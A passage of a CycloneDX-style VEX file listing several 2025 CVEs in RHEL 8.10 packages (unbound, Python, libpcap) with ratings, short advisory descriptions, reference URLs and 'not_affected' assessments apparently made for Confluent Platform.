          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33655"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11411"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18556.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18931"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-11411.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18931.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/11/msg00008.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/11/msg00032.html"
        },
        {
          "url": "https://nlnetlabs.nl/news/2025/Nov/26/unbound-1.24.2-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11411"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7855-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7855-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11411"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2025-11411.txt"
        }
      ],
      "published": "2025-10-22T13:15:29+00:00",
      "updated": "2026-06-17T08:30:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-11468",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11468"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11468"
        },
        {
          "url": "https://github.com/python/cpython/commit/003b8315669b9f08b1010a49071f73f15f818094"
        },
        {
          "url": "https://github.com/python/cpython/commit/17d1490aa97bd6b98a42b1a9b324ead84e7fd8a2"
        },
        {
          "url": "https://github.com/python/cpython/commit/61614a5e5056e4f61ced65008d4576f3df34acb6"
        },
        {
          "url": "https://github.com/python/cpython/commit/a76e4cd62dd68e7cbe86e37e6ed988495a646b66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e9970f077240c7c670e8a6fc6662f2b30d3b6ad0"
        },
        {
          "url": "https://github.com/python/cpython/commit/f738386838021c762efea6c9802c82de65e87796"
        },
        {
          "url": "https://github.com/python/cpython/issues/143935"
        },
        {
          "url": "https://github.com/python/cpython/pull/143936"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/FELSEOLBI2QR6YLG6Q7VYF7FWSGQTKLI/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11468"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11468"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-06-17T08:30:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-11961",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 1.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        122,
        126
      ],
      "description": "pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer.  The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented.  If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11961"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11961"
        },
        {
          "url": "https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11961"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11961"
        }
      ],
      "published": "2025-12-31T01:15:54+00:00",
      "updated": "2026-06-17T08:31:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14",
          "versions": [
            {
              "version": "14:1.9.1-5.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-12781",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        704
      ],
      "description": "When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the \"base64\" module the characters \"+/\" will always be accepted, regardless of the value of \"altchars\" parameter, typically used to establish an \"alternative base64 alphabet\" such as the URL safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues.\n\n\n\n\nThis behavior can only be insecure if your application uses an alternate base64 alphabet (without \"+/\"). If your application does not use the \"altchars\" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet.\n\n\n\n\nThe attached patches DOES NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior which will be replaced with the newly recommended behavior in a future version of Python.\u00a0Users are recommended to mitigate by verifying user-controlled inputs match the base64 \nalphabet they are expecting or verify that their application would not be \naffected if the b64decode() functions accepted \"+\" or \"/\" outside of altchars.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-12781"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-12781"
        },
        {
          "url": "https://github.com/python/cpython/commit/13360efd385d1a7d0659beba03787ea3d063ef9b"
        },
        {
          "url": "https://github.com/python/cpython/commit/1be80bec7960f5ccd059e75f3dfbd45fca302947"
        },
        {
          "url": "https://github.com/python/cpython/commit/9060b4abbe475591b6230b23c2afefeff26fcca5"
        },
        {
          "url": "https://github.com/python/cpython/commit/e95e783dff443b68e8179fdb57737025bf02ba76"
        },
        {
          "url": "https://github.com/python/cpython/commit/fd17ee026fa9b67f6288cbafe374a3e479fe03a5"
        },
        {
          "url": "https://github.com/python/cpython/issues/125346"
        },
        {
          "url": "https://github.com/python/cpython/pull/141128"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/KRI7GC6S27YV5NJ4FPDALS2WI5ENAFJ6/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12781"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-12781"
        }
      ],
      "published": "2026-01-21T20:16:04+00:00",
